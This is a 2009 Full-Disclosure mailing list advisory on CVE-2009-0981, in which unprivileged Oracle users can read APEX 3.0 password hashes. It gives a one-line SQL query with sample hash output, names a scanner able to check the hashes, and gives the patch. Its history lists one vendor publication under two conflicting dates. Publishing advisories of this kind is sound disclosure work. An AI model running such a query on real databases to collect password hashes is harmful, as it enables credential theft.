[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Unprivileged DB users can see APEX password hashes [CVE-2009-0981]

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Unprivileged DB users can see APEX password hashes [CVE-2009-0981]
From: Alexander Kornbrust <ak@xxxxxxxxxxxxxxxxxxxxxxxxx>
Date: Thu, 16 Apr 2009 07:51:11 +0200

Unprivileged DB users can see APEX password hashes [CVE-2009-0981]

Name                      Unprivileged DB users can see APEX password  
hashes
Systems Affected  APEX 3.0 (optional component of 11.1.0.7 installation)
Severity                   High Risk
Category                 Password Disclosure
Vendor URL           http://www.oracle.com/
Author                     Alexander Kornbrust
CVE                         CVE-2009-0981
Advisory                 14 April 2009 (V 1.00)


Details:
Unprivileged database users can see APEX password hashes in  
FLOWS_030000.WWV_FLOW_USER.

SQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS

USER_NAME    WEB_PASSWORD2
---------------------------------------------------------------------------
YURI         141FA790354FB6C72802FDEA86353F31

This password hash can be checked using a tool like Repscan.


Additional information is available in the following advisory.


Advisory:
http://www.red-database-security.com/advisory/apex_password_hashes.html


Patch Information:
Upgrade to Oracle APEX 3.2.


Verification:
Our Oracle database scanner Repscan was updated with the information  
from the Oracle
CPU April 2009 and can identify vulnerable databases.
More Information about Repscan can be found here:
http://www.sentrigo.com/repscan


History:
13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published


About Red-Database-Security:
Red-Database-Security is the leading company for Oracle security.  
Within the last
6 years we reported several hundred vulnerabilities to Oracle.

--
(c) 2009 by Red-Database-Security GmbH
http://www.red-database-security.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Hacker Space Fest 2009 CFP: Call For Paper
Next by Date: [Full-disclosure] SQL Injection in package DBMS_AQIN [CVE-2009-0992]
Previous by thread: [Full-disclosure] [SECURITY] [DSA 1771-1] New clamav packages fix several vulnerabilities
Next by thread: [Full-disclosure] SQL Injection in package DBMS_AQIN [CVE-2009-0992]
Index(es):
- Date
- Thread